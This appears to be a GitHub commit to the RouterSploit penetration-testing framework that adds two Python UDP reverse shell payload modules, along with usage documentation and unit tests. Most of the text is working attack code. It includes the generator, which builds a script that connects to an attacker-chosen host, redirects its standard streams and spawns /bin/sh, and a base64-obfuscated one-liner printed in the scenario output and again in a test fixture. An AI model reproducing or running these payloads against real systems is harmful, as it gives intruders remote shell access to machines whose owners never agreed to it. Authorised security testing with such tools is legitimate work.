Unverified Commit 5100a72b by Marcin Bury Committed by GitHub

Adding Python UDP Reverse Shell payloads (#458)

parent bf0f120b
## Description
Module generates payload that creates interactive udp reverse shell by using python one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/python_reverse_udp`
3. Do: `set lhost`
4. Do: `set lport 4321`
5. Do: `run`
6. Module generates python udp reverse shell payload
## Scenarios
rsf > use payloads/cmd/python_reverse_udp
rsf (Python Reverse UDP One-Liner) > set lhost
[+] lhost =>
rsf (Python Reverse UDP One-Liner) > set lport 4321
[+] lport => 4321
rsf (Python Reverse UDP One-Liner) > run
[*] Running module...
[*] Generating payload
python -c "exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))"
## Description
Module generates payload that creates interactive udp reverse shell by using python.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/python/reverse_udp`
3. Do: `set lhost`
3. Do: `set lport 4321`
4. Do: `run`
5. Module generates python udp reverse shell payload
## Scenarios
rsf > use payloads/python/reverse_udp
rsf (Python Reverse UDP) > set lhost
[+] lhost =>
rsf (Python Reverse UDP) > set lport 4321
[+] lport => 4321
rsf (Python Reverse UDP) > run
[*] Running module...
[*] Generating payload
from routersploit.core.exploit import *
from routersploit.modules.payloads.python.reverse_udp import Exploit as PythonBindUDP
class Exploit(PythonBindUDP):
__info__ = {
"name": "Python Reverse UDP One-Liner",
"description": "Creates interactive udp reverse shell by using python one-liner.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
cmd = OptString("python", "Python binary")
def generate(self):
payload = super(Exploit, self).generate()
cmd = '{} -c "{}"'.format(self.cmd, payload)
return cmd
from base64 import b64encode
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin
class Exploit(ReverseTCPPayloadMixin, GenericPayload):
__info__ = {
"name": "Python Reverse UDP",
"description": "Creates interactive udp reverse shell by using python.",
"authors": (
"Andre Marques (zc00l)", # shellpop
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
def generate(self):
payload = (
"import os\n" +
"import pty\n" +
"import socket\n" +
"s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n" +
"s.connect(('{}',{}))\n".format(self.lhost, self.lport) +
"os.dup2(s.fileno(), 0)\n" +
"os.dup2(s.fileno(), 1)\n" +
"os.dup2(s.fileno(), 2)\n" +
"pty.spawn('/bin/sh');\n" +
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "exec('{}'.decode('base64'))".format(encoded_payload)
from routersploit.modules.payloads.cmd.python_reverse_udp import Exploit
# reverse udp payload with lhost= lport=4321
reverse_udp = (
"python -c \"exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))\""
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = ""
payload.lport = 4321
assert payload.generate() == reverse_udp
from routersploit.modules.payloads.python.reverse_udp import Exploit
# reverse udp payload with lhost= lport=4321
reverse_udp = (
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = ""
payload.lport = 4321
assert payload.generate() == reverse_udp
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